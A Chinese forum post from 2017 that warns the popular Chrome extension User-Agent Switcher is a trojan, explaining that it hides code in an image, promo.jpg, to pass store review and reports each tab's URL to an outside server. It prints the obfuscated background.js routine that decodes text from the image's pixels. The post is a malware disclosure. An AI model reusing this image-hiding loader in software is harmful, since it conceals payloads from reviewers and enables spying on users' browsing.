请选择 进入手机版 | 继续访问电脑版

SEO圈子

 找回密码
 立即注册
搜索
查看: 22|回复: 0

Chrome 的插件 User-Agent Switcher 是个木马

[复制链接]

47

主题

63

帖子

1373

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
1373

VIP内测用户

发表于 2017-9-10 17:51:01 | 显示全部楼层 |阅读模式
chrome 商店搜索 User-Agent Switcher,排第一的这个插件(45 万用户),是一个木马...

https://chrome.google.com/websto ... obgihpdblnhmmbodake

为了绕过 chrome 的审核策略,他把恶意代码隐藏在了 promo.jpg 里

background.js 的第 80 行,从这个图片里解密出恶意代码并执行
  1. t.prototype.Vh = function(t, e) {
  2.             if ("" === '../promo.jpg') return "";
  3.             void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
  4.             var n = this.ET,
  5.                 i = e.mp || n.mp,
  6.                 o = e.Tv || n.Tv,
  7.                 h = e.At || n.At,
  8.                 a = r.Yb(Math.pow(2, i)),
  9.                 f = (e.WC || n.WC, e.TY || n.TY),
  10.                 u = document.createElement("canvas"),
  11.                 p = u.getContext("2d");
  12.             if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
  13.             e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
  14.             var c = p.getImageData(0, 0, u.width, u.height),
  15.                 d = c.data,
  16.                 g = [];
  17.             if (c.data.every(function(t) {
  18.                     return 0 === t
  19.                 })) return "";
  20.             var m, s;
  21.             if (1 === o)
  22.                 for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
  23.             var v = "",
  24.                 w = 0,
  25.                 y = 0,
  26.                 l = Math.pow(2, h) - 1;
  27.             for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);
  28.             return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
  29.         }
复制代码
会把你打开的每个 tab 的 url 等信息加密发送到 https://uaswitcher.org/logic/page/data

seo圈子-只为分享而存在的圈子:bbs.lichunseo.com
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

SEO圈子-只为分享而存在的圈子 ( 蜀ICP备17021932号-16 )

GMT+8, 2017-9-21 16:29

Powered by 黑帽SEO X3.3 Designed By SEO教程

© 2017-2017 SEO

快速回复 返回顶部 返回列表